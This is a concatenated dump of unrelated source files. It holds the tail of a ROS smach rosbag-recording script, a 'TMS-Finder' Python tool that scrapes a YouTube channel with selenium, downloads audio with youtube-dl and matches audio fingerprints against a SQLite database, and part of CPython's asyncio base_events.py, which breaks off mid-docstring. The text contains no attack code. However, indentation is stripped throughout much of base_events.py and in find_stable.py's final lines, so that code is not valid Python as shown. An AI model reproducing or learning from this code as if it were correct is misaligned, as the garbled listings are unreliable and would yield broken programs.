                               transitions={'aborted':'aborted',
                                            'succeeded':'WAIT'},
                               remapping={'file':'file',
                                          'topics':'topics'})
        smach.StateMachine.add('WAIT',
                               SleepState(5),
                               transitions={'succeeded':'STOP_RECORDING'})
        smach.StateMachine.add('STOP_RECORDING',
                               RecordROSBagState('STOP_RECORDING', bag_recorder, 'stop_all'),
                               transitions={'aborted':'aborted',
                                            'succeeded':'UNPUBLISH_MSG'})
        smach.StateMachine.add('UNPUBLISH_MSG',
                               PublishMsgState('UNPUBLISH_MSG', msg_publisher, 'stop_all'),
                               transitions={'aborted':'aborted',
                                            'succeeded':'succeeded'})
    # Run the state machine to completion.
    outcome = sm.execute()
if __name__ == '__main__':
    # Run the demo state machine when invoked as a script.
    main()
find_stable.py | import argparse #for getting command line arguments
import os #for various things
from selenium import webdriver, common #for getting html source of channel
from time import sleep #to prevent errors
import re
import bs4 as bs #for working with html source file
import subprocess #calling other script or executables from this file
import sys
from termcolor import * #for getting colored text
import colorama
### initialise colored text
colorama.init()
from libs.db_sqlite import SqliteDatabase #for working with the SQL database
from recognize_from_file import run_recognition
from libs.utils import align_matches
import math
import datetime # To include time info in the missed.txt file
# NOTE(review): this shadows the `datetime` module imported just above with the
# datetime *class* — only the class/time/date names are usable from here on.
from datetime import datetime, time, date
import time as tm # for getting script runtime
import threading
#import multiprocessing
### vars for script runtime and missed.txt time
now = datetime.now()
currentTime = time(now.hour, now.minute, now.second)
currentDate = date(now.year, now.month, now.day)
start_time = tm.time()
# Startup banner and usage hint.
print("""
Welcome to...
__ _______ ________ ___ _____ ______ _ _
\ \ / /_ _| |_ _| \/ |/ ___| | ___(_) | |
\ V / | | | | | . . |\ `--. | |_ _ _ __ __| | ___ _ __
\ / | | | | | |\/| | `--. \ | _| | | '_ \ / _` |/ _ \ '__|
| | | | | | | | | |/\__/ / | | | | | | | (_| | __/ |
\_/ \_/ \_/ \_| |_/\____/ \_| |_|_| |_|\__,_|\___|_|
Enter a channel URL to begin.
Example URL: https://www.youtube.com/channel/UCmSynKP6bHIlBqzBDpCeQPA/videos
""")
class Finder:
    """Scan a YouTube channel (or a single video) for audio that matches a
    local fingerprint database.

    Pipeline: scrape the channel's /videos page with selenium, extract video
    ids and durations, download each short video's audio with youtube-dl,
    fingerprint it and compare it against the SQLite database.
    """

    def __init__(self):
        # Make sure the download folder exists before anything else runs.
        if not os.path.isdir("downloaded_mp3s"):
            os.mkdir("downloaded_mp3s")
        ### setting variables
        self.arguments = get_arguments()
        self.sql = SqliteDatabase()
        # --id, --channel and --restore-file are mutually exclusive sources.
        assert 3 - [self.arguments.id, self.arguments.restore_file, self.arguments.channel_url].count(None) <= 1, "Can't have any of the ID, channel, or restore file as combined arguments."
        # With no source given at all, ask for a channel URL interactively.
        if (self.arguments.id is None and self.arguments.channel_url is None and self.arguments.restore_file is None):
            self.arguments.channel_url = input("URL: ")  # Example input: www.youtube.com/c/GlitchxCity/featured
        # If there is a url, verify and normalise it.
        if self.arguments.channel_url is not None:
            self.verify_url(self.arguments.channel_url)
        self.ignore_checked = self.arguments.ignore
        self.verbose = self.arguments.verbose
        self.speedmode = self.arguments.speedmode
        self.vprint(str(self.arguments), "yellow")
        ### Make sure that there are no leftovers from previous runs
        self.delete_mp3s()

    def verify_url(self, url):
        """Validate *url* and store the normalised ".../videos" address on
        self.channel_url, re-prompting until a valid URL is supplied.

        BUGFIX: the original prompted once for a replacement URL but never
        re-validated it and never set self.channel_url on that path.
        """
        expr_channel = r"^.*(/c(hannel)?/[a-zA-Z0-9-_]+)"
        expr_user = r"^.*(/u(ser)?/[a-zA-Z0-9-_]+)"
        while True:
            # Channel-style paths take precedence over user-style paths.
            match = re.match(expr_channel, url) or re.match(expr_user, url)
            if match is not None:
                channel_path = match.groups()[0]
                self.channel_url = "https://www.youtube.com" + channel_path + "/videos"
                return True
            url = input("The URL you entered is invalid. Please enter a valid URL: ")

    def vprint(self, text: str, colour: str = "white"):
        """Print *text* in *colour* only when verbose mode is on."""
        if self.verbose:
            cprint(text, colour)

    def get_song_mp3(self, id: str) -> str:
        """Download the audio of the YouTube video *id* as an mp3.

        Returns the absolute path of a file inside downloaded_mp3s/, or
        None when the download failed (failure is appended to missed.txt).
        """
        url = "https://youtube.com/watch?v=" + id
        dir_here = os.path.abspath(os.getcwd())
        dir_youtube_dl_dir = os.path.join(dir_here, "youtube-dl")
        # The executable name differs between Windows and other platforms.
        if sys.platform == "win32":
            youtube_dl_exec = "youtube-dl.exe"
        else:
            youtube_dl_exec = "youtube-dl"
        path_youtube_dl_exec = os.path.join(dir_youtube_dl_dir, youtube_dl_exec)
        dir_downloaded_mp3s = os.path.join(dir_here, "downloaded_mp3s")
        # youtube-dl expands "%(ext)s"; naming the file after the video id
        # lets check_file() recover the id from the filename later.
        destination_arg = os.path.join(dir_downloaded_mp3s, f"{id}.%(ext)s")
        # Make the mp3 folder which will contain a downloaded mp3.
        if not os.path.isdir(dir_downloaded_mp3s):
            os.mkdir(dir_downloaded_mp3s)
        # Speed mode only keeps the first 15 seconds of audio.
        if not self.speedmode:
            cmd = [
                f"{path_youtube_dl_exec}", "-x", "--audio-format", "mp3",
                "--no-warnings", "-o", f"{destination_arg}", f"{url}"
            ]
        else:
            cmd = [f"{path_youtube_dl_exec}", "-x", "--postprocessor-args", "\"-ss 00:00:00.00 -t 00:00:15.00\"", f"{url}", "--audio-format", "mp3", "-o", f"{destination_arg}"]
        try:
            # NOTE: the command is joined into one string because the
            # speed-mode postprocessor arguments carry embedded quotes.
            subprocess.check_output(' '.join(cmd))
            sleep(0.1)
            self.vprint("Audio downloaded! Performing fingerprint match scan...")
        except KeyboardInterrupt:
            # Completely exit the program if that is what the user wants.
            self.delete_mp3s()
            exit()
        except Exception:
            # BUGFIX: was a bare "except:", which also swallowed SystemExit.
            # Always show the error, even when verbose is off.
            cprint("Video audio couldn't be downloaded. Skipping for now. Please check missed.txt for more info.", "red")
            with open("missed.txt", "a") as f:
                f.write(f"{currentDate} {currentTime}: Could not check video with ID {id}. Please copy and paste this URL in your browser to check: 'youtube.com/watch?v={id}'\n")
            # Callers treat None as "skip this video".
            return None
        # NOTE(review): returns the first file in the folder, which assumes
        # at most one download at a time; with --multi-threading > 1 the
        # returned path may belong to a different video — the return value
        # is only consumed in single-video mode (check_one_video).
        return os.path.abspath(os.path.join("downloaded_mp3s", os.listdir("downloaded_mp3s")[0]))

    def delete_mp3s(self):
        """Delete every file in the downloaded_mp3s folder."""
        current_directory = os.getcwd()
        for file in os.listdir("downloaded_mp3s"):
            full_path = os.path.join(current_directory, "downloaded_mp3s", file)
            os.remove(full_path)

    def get_channel_source(self):
        """Return the fully-scrolled HTML source of the channel's /videos
        page, or the contents of the restore file when one was supplied.

        Also writes the scraped source to restore_file.html so later runs
        can skip the browser via --restore-file.
        """
        if self.arguments.restore_file is not None:
            with open(self.arguments.restore_file) as f:
                return f.read()
        # BUGFIX: the ChromeOptions were created *after* the driver and
        # therefore never applied; build them first and pass them in.
        options = webdriver.ChromeOptions()
        options.add_experimental_option('excludeSwitches', ['enable-logging'])
        # Open a browser and catch the chromedriver-not-found error.
        try:
            driver = webdriver.Chrome(options=options)
        except common.exceptions.WebDriverException:
            try:
                driver = webdriver.Chrome(executable_path=r"C:\ProgramData\chocolatey\bin\chromedriver.exe", options=options)
            except Exception:
                print("If you see this message, that means selenium can't find 'chromedriver.exe.'")
                print("To fix this, search for 'chromedriver.exe' on your file system.")
                print(r"Example of 'chromedriver.exe' path: 'C:\ProgramData\chocolatey\bin\chromedriver.exe'")
                location = input("Once you've found 'chromedriver.exe', paste the location to it here: ")
                driver = webdriver.Chrome(executable_path=location, options=options)
                print("Alternatively, you can put it in the code yourself so you don't have to constantly fill this in.")
                print("To do that, in the file 'find_stable.py', search for the line \"driver = webdriver.Chrome()\" and in between the brackets put:")
                print("executable_path = (your chromedriver location)")
        driver.get(self.channel_url)
        sleep(2)
        source = driver.page_source
        # Keep scrolling until the page stops growing (end of the list).
        scroll_by = 5000
        driver.execute_script(f"window.scrollBy(0, {scroll_by});")
        while driver.page_source != source:
            source = driver.page_source
            driver.execute_script(f"window.scrollBy(0, {scroll_by});")
            sleep(0.1)
        driver.quit()
        with open("restore_file.html", "w") as f:
            f.write(source.encode('utf-8').decode('ascii', 'ignore'))
        return source

    def check_file(self, fpath, thresh=20):
        """Fingerprint the mp3 at *fpath* and match it against the database.

        Returns True when the match confidence reaches *thresh*. Exact
        (>= 400) and possible matches are appended to MATCHES.txt.
        """
        # The file is named "<video id>.mp3", so the id is the stem.
        base = os.path.basename(fpath)
        id_, _ = os.path.splitext(base)
        matches = run_recognition(fpath)
        song = align_matches(self.sql, matches)
        confidence = song['CONFIDENCE']
        self.vprint(f"Confidence of a match: {confidence}.", "yellow")
        if confidence >= 400:
            self.vprint(f"EXACT MATCH FOUND FOR ID: {id_}", "green")
            with open("MATCHES.txt", "a") as f:
                f.write(f"{currentDate} {currentTime}: You've found an identical match with the database. Video with ID {id_} is an EXACT match, with a confidence of {confidence}!!\n")
        elif confidence >= thresh:
            self.vprint(f"POSSIBLE MATCH FOUND FOR ID: {id_}", "green")
            with open("MATCHES.txt", "a") as f:
                f.write(f"{currentDate} {currentTime}: Video with YT ID {id_} has a possible match with the database, with a confidence of {confidence}! Check it out!\n")
        return confidence >= thresh

    def get_videos(self, source):
        """Extract video ids and durations (in seconds) from the channel
        page *source*.

        Returns a list of dicts: {"id": <video id>, "duration": <int>}.
        """
        watch_expr = r'href="/watch\?v=([a-zA-Z0-9_-]+)"'
        matches = re.finditer(watch_expr, source)
        # Each id appears twice in the page source, so keep every other hit.
        video_ids = [match.groups()[0] for match in matches][::2]
        soup = bs.BeautifulSoup(source, "html.parser")
        # All durations live in spans with this thumbnail-overlay class.
        time_spans = soup.findAll(
            "span",
            {"class": "style-scope ytd-thumbnail-overlay-time-status-renderer"}
        )
        raw_durations = [ts.text.strip() for ts in time_spans]
        del time_spans
        durations = []
        for raw_duration in raw_durations:
            time_units = raw_duration.split(":")
            seconds = int(time_units[-1])
            # ROBUSTNESS: guard sub-minute labels like "45" (the original
            # assumed at least "M:SS" and would raise IndexError).
            minutes = int(time_units[-2]) if len(time_units) > 1 else 0
            hours = int(time_units[-3]) if len(time_units) > 2 else 0
            durations.append(seconds + minutes * 60 + hours * 3600)
        # Pair ids with durations positionally.
        # (We may need the video titles too if speed mode is extended.)
        return [
            {"id": video_id, "duration": duration}
            for video_id, duration in zip(video_ids, durations)
        ]

    def check_one_video(self, id_):
        """Download and fingerprint a single video given its YouTube id."""
        song_fpath = self.get_song_mp3(id_)
        if song_fpath is None:
            # Download failed; already logged to missed.txt.
            return
        # BUGFIX: honour --threshold here too (was silently falling back
        # to check_file's default of 20, which is also the flag default,
        # so behaviour is unchanged unless the user passed -t).
        possible_match = self.check_file(song_fpath, self.arguments.threshold)
        if possible_match:
            song_fname = os.path.split(song_fpath)[1]
            with open("MATCHES.txt", "a") as f:
                f.write(f"{currentDate} {currentTime}: {song_fname} with YT ID {id_} has a possible match with the database! Check it out!\n")
        else:
            self.vprint("Probably not a match.")

    def check_channel(self, max_duration=210):
        """Scan every unchecked video of at most *max_duration* seconds on
        the channel, --multi-threading videos at a time."""
        # Get the HTML source of the channel's video section.
        source = self.get_channel_source()
        videos = self.get_videos(source)
        # Keep short videos; with --ignore, also skip already-checked ids.
        # (Equivalent to the original's "(p^~q) or (p^(q^~r))" predicate.)
        target_videos = [
            video for video in videos
            if video["duration"] <= max_duration
            and (not self.ignore_checked or not self.sql.in_checked_ids(video["id"]))
        ]
        # Total number of videos, used to display progress percentage.
        total_videos = len(target_videos)
        if total_videos == 0:
            self.vprint("All videos have been checked or are longer than the maximum duration.", "green")
            exit()
        threads = self.arguments.threads
        checked = 0  # progress counter for the percentage display
        # BUGFIX: round() could drop the trailing partial batch (e.g. 5
        # videos / 2 threads -> round(2.5) == 2 batches == 4 videos);
        # ceil() always covers every target video.
        for index in range(math.ceil(total_videos / threads)):
            section = target_videos[threads * index : threads * (index + 1)]
            ### Downloading mp3 with multithreading
            jobs = []
            for video in section:
                id_ = video["id"]
                thread = threading.Thread(target=self.get_song_mp3, args=(id_,))
                jobs.append(thread)
                # BUGFIX: was a plain (non-f) string printing the literal
                # text "{id}" instead of the video id.
                self.vprint(f"Downloading audio from video with ID {id_}...")
            try:
                for job in jobs:
                    checked += 1
                    job.start()
                for job in jobs:
                    job.join()
            except KeyboardInterrupt:
                # BUGFIX: the cleanup call was missing its parentheses
                # ("self.delete_mp3s" was a no-op attribute access).
                self.delete_mp3s()
                exit()
            ### Fingerprinting with multithreading
            jobs = []
            for file in os.listdir("downloaded_mp3s"):
                p = threading.Thread(
                    target=self.check_file,
                    args=(os.path.join("downloaded_mp3s", file), self.arguments.threshold),
                )
                filename, file_extension = os.path.splitext(file)
                self.sql.add_checked_id(filename)
                jobs.append(p)
            for job in jobs:
                job.start()
            for job in jobs:
                job.join()
            self.vprint(f"{100 * checked / total_videos:.2f}% done")
            self.delete_mp3s()
        print("")
        self.delete_mp3s()

    def main(self):
        """Entry point: check one video when --id was given, otherwise the
        whole channel; then report the elapsed time."""
        if self.arguments.id is not None:
            self.check_one_video(self.arguments.id)
        else:
            self.check_channel()
        self.vprint(f"Duration of channel scan in seconds: {tm.time() - start_time}")
def get_arguments():
    """Build the TMS-Finder argument parser and return the parsed args."""
    parser = argparse.ArgumentParser(description='''TMS-Finder''')
    # Boolean switches.
    parser.add_argument("-i", "--ignore", dest="ignore", action='store_true',
                        default=False, help="Ignore already checked videos")
    parser.add_argument("-s", "--speedmode", dest="speedmode",
                        action="store_true", help="Activate speed mode")
    parser.add_argument("-v", "--verbose", dest="verbose", action="store_true",
                        default=True, help="Give Feedback, default = True")
    # Numeric tuning knobs.
    parser.add_argument("-t", "--threshold", dest="threshold", action="store",
                        type=int, default=20,
                        help="Set the threshold for the number of hash matches at which you are notified of a match, default is 20")
    parser.add_argument("-m", "--multi-threading", dest="threads",
                        action="store", type=int, default=1,
                        help="Amount of videos allowed to concurrently check, default is 1")
    # Mutually-exclusive input sources (enforced by the caller).
    parser.add_argument("-c", "--channel", dest="channel_url",
                        help="Parse the channel url as command line argument")
    parser.add_argument("-id", "--id", dest="id",
                        help="Test a single video instead of a whole YT channel.")
    parser.add_argument("-r", "--restore-file", dest="restore_file",
                        help="Give a restore file to get the html source of a channel without opening the browser again")
    return parser.parse_args()
if __name__ == '__main__':
finder = Finder()
finder.main() |
base_events.py | """Base implementation of event loop.
The event loop can be broken up into a multiplexer (the part
responsible for notifying us of I/O events) and the event loop proper,
which wraps a multiplexer with functionality for scheduling callbacks,
immediately or at a given time in the future.
Whenever a public API takes a callback, subsequent positional
arguments will be passed to the callback if/when it is called. This
avoids the proliferation of trivial lambdas implementing closures.
Keyword arguments for the callback are not supported; this is a
conscious design decision, leaving the door open for keyword arguments
to modify the meaning of the API call itself.
"""
import collections
import collections.abc
import concurrent.futures
import functools
import heapq
import itertools
import os
import socket
import stat
import subprocess
import threading
import time
import traceback
import sys
import warnings
import weakref
try:
import ssl
except ImportError: # pragma: no cover
ssl = None
from . import constants
from . import coroutines
from . import events
from . import exceptions
from . import futures
from . import protocols
from . import sslproto
from . import staggered
from . import tasks
from . import transports
from . import trsock
from .log import logger
__all__ = 'BaseEventLoop',
# Minimum number of _scheduled timer handles before cleanup of
# cancelled handles is performed.
_MIN_SCHEDULED_TIMER_HANDLES = 100
# Minimum fraction of _scheduled timer handles that are cancelled
# before cleanup of cancelled handles is performed.
_MIN_CANCELLED_TIMER_HANDLES_FRACTION = 0.5
_HAS_IPv6 = hasattr(socket, 'AF_INET6')
# Maximum timeout passed to select to avoid OS limitations
MAXIMUM_SELECT_TIMEOUT = 24 * 3600
# Used for deprecation and removal of `loop.create_datagram_endpoint()`'s
# *reuse_address* parameter
_unset = object()
def _format_handle(handle):
    """Describe *handle* for debug logs.

    When the handle's callback is a bound method of a Task, show the
    task's repr instead of the raw handle text.
    """
    owner = getattr(handle._callback, '__self__', None)
    if isinstance(owner, tasks.Task):
        # format the task
        return repr(owner)
    return str(handle)
def _format_pipe(fd):
if fd == subprocess.PIPE:
return '<pipe>'
elif fd == subprocess.STDOUT:
return '<stdout>'
else:
return repr(fd)
def _set_reuseport(sock):
if not hasattr(socket, 'SO_REUSEPORT'):
raise ValueError('reuse_port not supported by socket module')
else:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT, 1)
except OSError:
raise ValueError('reuse_port not supported by socket module, '
'SO_REUSEPORT defined but not implemented.')
def _ipaddr_info(host, port, family, type, proto, flowinfo=0, scopeid=0):
# Try to skip getaddrinfo if "host" is already an IP. Users might have
# handled name resolution in their own code and pass in resolved IPs.
if not hasattr(socket, 'inet_pton'):
return
if proto not in {0, socket.IPPROTO_TCP, socket.IPPROTO_UDP} or \
host is None:
return None
if type == socket.SOCK_STREAM:
proto = socket.IPPROTO_TCP
elif type == socket.SOCK_DGRAM:
proto = socket.IPPROTO_UDP
else:
return None
if port is None:
port = 0
elif isinstance(port, bytes) and port == b'':
port = 0
elif isinstance(port, str) and port == '':
port = 0
else:
# If port's a service name like "http", don't skip getaddrinfo.
try:
port = int(port)
except (TypeError, ValueError):
return None
if family == socket.AF_UNSPEC:
afs = [socket.AF_INET]
if _HAS_IPv6:
afs.append(socket.AF_INET6)
else:
afs = [family]
if isinstance(host, bytes):
host = host.decode('idna')
if '%' in host:
# Linux's inet_pton doesn't accept an IPv6 zone index after host,
# like '::1%lo0'.
return None
for af in afs:
try:
socket.inet_pton(af, host)
# The host has already been resolved.
if _HAS_IPv6 and af == socket.AF_INET6:
return af, type, proto, '', (host, port, flowinfo, scopeid)
else:
return af, type, proto, '', (host, port)
except OSError:
pass
# "host" is not an IP address.
return None
def _interleave_addrinfos(addrinfos, first_address_family_count=1):
"""Interleave list of addrinfo tuples by family."""
# Group addresses by family
addrinfos_by_family = collections.OrderedDict()
for addr in addrinfos:
family = addr[0]
if family not in addrinfos_by_family:
addrinfos_by_family[family] = []
addrinfos_by_family[family].append(addr)
addrinfos_lists = list(addrinfos_by_family.values())
reordered = []
if first_address_family_count > 1:
reordered.extend(addrinfos_lists[0][:first_address_family_count - 1])
del addrinfos_lists[0][:first_address_family_count - 1]
reordered.extend(
a for a in itertools.chain.from_iterable(
itertools.zip_longest(*addrinfos_lists)
) if a is not None)
return reordered
def _run_until_complete_cb(fut):
    """Done-callback installed by run_until_complete() to stop the loop."""
    if not fut.cancelled():
        if isinstance(fut.exception(), (SystemExit, KeyboardInterrupt)):
            # Issue #22429: run_forever() already finished, no need to
            # stop it.
            return
    futures._get_loop(fut).stop()
if hasattr(socket, 'TCP_NODELAY'):
    def _set_nodelay(sock):
        # Disable Nagle's algorithm, but only on TCP stream sockets over
        # IPv4/IPv6; other families/types are left untouched.
        if (sock.family in {socket.AF_INET, socket.AF_INET6} and
                sock.type == socket.SOCK_STREAM and
                sock.proto == socket.IPPROTO_TCP):
            sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
else:
    def _set_nodelay(sock):
        # Platform lacks TCP_NODELAY: provide a no-op so callers do not
        # need to check for support themselves.
        pass
def _check_ssl_socket(sock):
if ssl is not None and isinstance(sock, ssl.SSLSocket):
raise TypeError("Socket cannot be of type SSLSocket")
class _SendfileFallbackProtocol(protocols.Protocol):
    """Temporary protocol installed on a transport while loop.sendfile()
    falls back to a write-based copy.

    It pauses reading, turns the transport's flow-control callbacks into
    an awaitable drain(), and restore() puts the original protocol back
    when the copy is finished.
    """
    def __init__(self, transp):
        if not isinstance(transp, transports._FlowControlMixin):
            raise TypeError("transport should be _FlowControlMixin instance")
        self._transport = transp
        # Original protocol, reinstated by restore().
        self._proto = transp.get_protocol()
        # Remember the transport's reading/writing state so restore()
        # can re-establish it afterwards.
        self._should_resume_reading = transp.is_reading()
        self._should_resume_writing = transp._protocol_paused
        transp.pause_reading()
        transp.set_protocol(self)
        if self._should_resume_writing:
            # Writing is currently paused: drain() must wait until the
            # transport signals resume_writing().
            self._write_ready_fut = self._transport._loop.create_future()
        else:
            self._write_ready_fut = None
    async def drain(self):
        """Wait until the transport can accept more data (or raise if
        the connection is closing)."""
        if self._transport.is_closing():
            raise ConnectionError("Connection closed by peer")
        fut = self._write_ready_fut
        if fut is None:
            return
        await fut
    def connection_made(self, transport):
        # The connection exists before this protocol is installed.
        raise RuntimeError("Invalid state: "
                           "connection should have been established already.")
    def connection_lost(self, exc):
        if self._write_ready_fut is not None:
            # Never happens if peer disconnects after sending the whole content
            # Thus disconnection is always an exception from user perspective
            if exc is None:
                self._write_ready_fut.set_exception(
                    ConnectionError("Connection is closed by peer"))
            else:
                self._write_ready_fut.set_exception(exc)
        # Forward the event to the real protocol.
        self._proto.connection_lost(exc)
    def pause_writing(self):
        if self._write_ready_fut is not None:
            return
        self._write_ready_fut = self._transport._loop.create_future()
    def resume_writing(self):
        if self._write_ready_fut is None:
            return
        self._write_ready_fut.set_result(False)
        self._write_ready_fut = None
    def data_received(self, data):
        # Reading was paused in __init__; receiving data is a logic error.
        raise RuntimeError("Invalid state: reading should be paused")
    def eof_received(self):
        raise RuntimeError("Invalid state: reading should be paused")
    async def restore(self):
        """Reinstall the original protocol and restore the transport's
        previous reading/writing state."""
        self._transport.set_protocol(self._proto)
        if self._should_resume_reading:
            self._transport.resume_reading()
        if self._write_ready_fut is not None:
            # Cancel the future.
            # Basically it has no effect because protocol is switched back,
            # no code should wait for it anymore.
            self._write_ready_fut.cancel()
        if self._should_resume_writing:
            self._proto.resume_writing()
class Server(events.AbstractServer):
    """Concrete server object returned by loop.create_server().

    Tracks the listening sockets, the number of live client transports
    (_active_count), and the futures of callers blocked in wait_closed()
    or serve_forever().
    """
    def __init__(self, loop, sockets, protocol_factory, ssl_context, backlog,
                 ssl_handshake_timeout):
        self._loop = loop
        self._sockets = sockets
        # Number of attached client transports; close() only wakes the
        # wait_closed() waiters once this drops back to zero.
        self._active_count = 0
        self._waiters = []
        self._protocol_factory = protocol_factory
        self._backlog = backlog
        self._ssl_context = ssl_context
        self._ssl_handshake_timeout = ssl_handshake_timeout
        self._serving = False
        self._serving_forever_fut = None
    def __repr__(self):
        return f'<{self.__class__.__name__} sockets={self.sockets!r}>'
    def _attach(self):
        # Called by every accepted transport; only valid while open.
        assert self._sockets is not None
        self._active_count += 1
    def _detach(self):
        # Called when a transport goes away; the last one out after
        # close() releases the wait_closed() waiters.
        assert self._active_count > 0
        self._active_count -= 1
        if self._active_count == 0 and self._sockets is None:
            self._wakeup()
    def _wakeup(self):
        # Resolve every pending wait_closed() future exactly once;
        # _waiters is set to None so this cannot run twice.
        waiters = self._waiters
        self._waiters = None
        for waiter in waiters:
            if not waiter.done():
                waiter.set_result(waiter)
    def _start_serving(self):
        # Idempotent: start listening and register the accept callback
        # for every socket with the event loop.
        if self._serving:
            return
        self._serving = True
        for sock in self._sockets:
            sock.listen(self._backlog)
            self._loop._start_serving(
                self._protocol_factory, sock, self._ssl_context,
                self, self._backlog, self._ssl_handshake_timeout)
    def get_loop(self):
        return self._loop
    def is_serving(self):
        return self._serving
    @property
    def sockets(self):
        # Read-only snapshot; empty tuple once the server is closed.
        if self._sockets is None:
            return ()
        return tuple(trsock.TransportSocket(s) for s in self._sockets)
    def close(self):
        """Stop serving: unregister and close the listening sockets.

        Existing client connections keep running; wait_closed() waiters
        are woken once the last transport detaches.
        """
        sockets = self._sockets
        if sockets is None:
            return
        self._sockets = None
        for sock in sockets:
            self._loop._stop_serving(sock)
        self._serving = False
        if (self._serving_forever_fut is not None and
                not self._serving_forever_fut.done()):
            self._serving_forever_fut.cancel()
            self._serving_forever_fut = None
        if self._active_count == 0:
            self._wakeup()
    async def start_serving(self):
        self._start_serving()
        # Skip one loop iteration so that all 'loop.add_reader'
        # go through.
        await tasks.sleep(0)
    async def serve_forever(self):
        """Start accepting connections and block until cancelled; on
        cancellation the server is closed before the error propagates."""
        if self._serving_forever_fut is not None:
            raise RuntimeError(
                f'server {self!r} is already being awaited on serve_forever()')
        if self._sockets is None:
            raise RuntimeError(f'server {self!r} is closed')
        self._start_serving()
        self._serving_forever_fut = self._loop.create_future()
        try:
            await self._serving_forever_fut
        except exceptions.CancelledError:
            try:
                self.close()
                await self.wait_closed()
            finally:
                raise
        finally:
            self._serving_forever_fut = None
    async def wait_closed(self):
        """Block until the server is closed and all connections are gone."""
        if self._sockets is None or self._waiters is None:
            return
        waiter = self._loop.create_future()
        self._waiters.append(waiter)
        await waiter
class BaseEventLoop(events.AbstractEventLoop):
def __init__(self):
self._timer_cancelled_count = 0
self._closed = False
self._stopping = False
self._ready = collections.deque()
self._scheduled = []
self._default_executor = None
self._internal_fds = 0
# Identifier of the thread running the event loop, or None if the
# event loop is not running
self._thread_id = None
self._clock_resolution = time.get_clock_info('monotonic').resolution
self._exception_handler = None
self.set_debug(coroutines._is_debug_mode())
# In debug mode, if the execution of a callback or a step of a task
# exceed this duration in seconds, the slow callback/task is logged.
self.slow_callback_duration = 0.1
self._current_handle = None
self._task_factory = None
self._coroutine_origin_tracking_enabled = False
self._coroutine_origin_tracking_saved_depth = None
# A weak set of all asynchronous generators that are
# being iterated by the loop.
self._asyncgens = weakref.WeakSet()
# Set to True when `loop.shutdown_asyncgens` is called.
self._asyncgens_shutdown_called = False
# Set to True when `loop.shutdown_default_executor` is called.
self._executor_shutdown_called = False
def __repr__(self):
return (
f'<{self.__class__.__name__} running={self.is_running()} '
f'closed={self.is_closed()} debug={self.get_debug()}>'
)
def create_future(self):
"""Create a Future object attached to the loop."""
return futures.Future(loop=self)
def create_task(self, coro, *, name=None):
"""Schedule a coroutine object.
Return a task object.
"""
self._check_closed()
if self._task_factory is None:
task = tasks.Task(coro, loop=self, name=name)
if task._source_traceback:
del task._source_traceback[-1]
else:
task = self._task_factory(self, coro)
tasks._set_task_name(task, name)
return task
def set_task_factory(self, factory):
"""Set a task factory that will be used by loop.create_task().
If factory is None the default task factory will be set.
If factory is a callable, it should have a signature matching
'(loop, coro)', where 'loop' will be a reference to the active
event loop, 'coro' will be a coroutine object. The callable
must return a Future.
"""
if factory is not None and not callable(factory):
raise TypeError('task factory must be a callable or None')
self._task_factory = factory
def get_task_factory(self):
"""Return a task factory, or None if the default one is in use."""
return self._task_factory
def _make_socket_transport(self, sock, protocol, waiter=None, *,
extra=None, server=None):
"""Create socket transport."""
raise NotImplementedError
def _make_ssl_transport(
self, rawsock, protocol, sslcontext, waiter=None,
*, server_side=False, server_hostname=None,
extra=None, server=None,
ssl_handshake_timeout=None,
call_connection_made=True):
"""Create SSL transport."""
raise NotImplementedError
def _make_datagram_transport(self, sock, protocol,
address=None, waiter=None, extra=None):
"""Create datagram transport."""
raise NotImplementedError
def _make_read_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create read pipe transport."""
raise NotImplementedError
def _make_write_pipe_transport(self, pipe, protocol, waiter=None,
extra=None):
"""Create write pipe transport."""
raise NotImplementedError
async def _make_subprocess_transport(self, protocol, args, shell,
stdin, stdout, stderr, bufsize,
extra=None, **kwargs):
"""Create subprocess transport."""
raise NotImplementedError
def _write_to_self(self):
"""Write a byte to self-pipe, to wake up the event loop.
This may be called from a different thread.
The subclass is responsible for implementing the self-pipe.
"""
raise NotImplementedError
def _process_events(self, event_list):
"""Process selector events."""
raise NotImplementedError
def _check_closed(self):
if self._closed:
raise RuntimeError('Event loop is closed')
def _check_default_executor(self):
if self._executor_shutdown_called:
raise RuntimeError('Executor shutdown has been called')
def _asyncgen_finalizer_hook(self, agen):
self._asyncgens.discard(agen)
if not self.is_closed():
self.call_soon_threadsafe(self.create_task, agen.aclose())
def _asyncgen_firstiter_hook(self, agen):
if self._asyncgens_shutdown_called:
warnings.warn(
f"asynchronous generator {agen!r} was scheduled after "
f"loop.shutdown_asyncgens() call",
ResourceWarning, source=self)
self._asyncgens.add(agen)
async def shutdown_asyncgens(self):
"""Shutdown all active asynchronous generators."""
self._asyncgens_shutdown_called = True
if not len(self._asyncgens):
# If Python version is <3.6 or we don't have any asynchronous
# generators alive.
return
closing_agens = list(self._asyncgens)
self._asyncgens.clear()
results = await tasks._gather(
*[ag.aclose() for ag in closing_agens],
return_exceptions=True,
loop=self)
for result, agen in zip(results, closing_agens):
if isinstance(result, Exception):
self.call_exception_handler({
'message': f'an error occurred during closing of '
f'asynchronous generator {agen!r}',
'exception': result,
'asyncgen': agen
})
async def shutdown_default_executor(self):
"""Schedule the shutdown of the default executor."""
self._executor_shutdown_called = True
if self._default_executor is None:
return
future = self.create_future()
thread = threading.Thread(target=self._do_shutdown, args=(future,))
thread.start()
try:
await future
finally:
thread.join()
def _do_shutdown(self, future):
try:
self._default_executor.shutdown(wait=True)
self.call_soon_threadsafe(future.set_result, None)
except Exception as ex:
self.call_soon_threadsafe(future.set_exception, ex)
def _check_running(self):
if self.is_running():
raise RuntimeError('This event loop is already running')
if events._get_running_loop() is not None:
raise RuntimeError(
'Cannot run the event loop while another loop is running')
def run_forever(self):
"""Run until stop() is called."""
self._check_closed()
self._check_running()
self._set_coroutine_origin_tracking(self._debug)
self._thread_id = threading.get_ident()
old_agen_hooks = sys.get_asyncgen_hooks()
sys.set_asyncgen_hooks(firstiter=self._asyncgen_firstiter_hook,
finalizer=self._asyncgen_finalizer_hook)
try:
events._set_running_loop(self)
while True:
self._run_once()
if self._stopping:
break
finally:
self._stopping = False
self._thread_id = None
events._set_running_loop(None)
self._set_coroutine_origin_tracking(False)
sys.set_asyncgen_hooks(*old_agen_hooks)
def run_until_complete(self, future):
"""Run until the Future is done.
If the argument is a coroutine, it is wrapped in a Task.
WARNING: It would be disastrous to call run_until_complete()
with the same coroutine twice -- it would wrap it in two
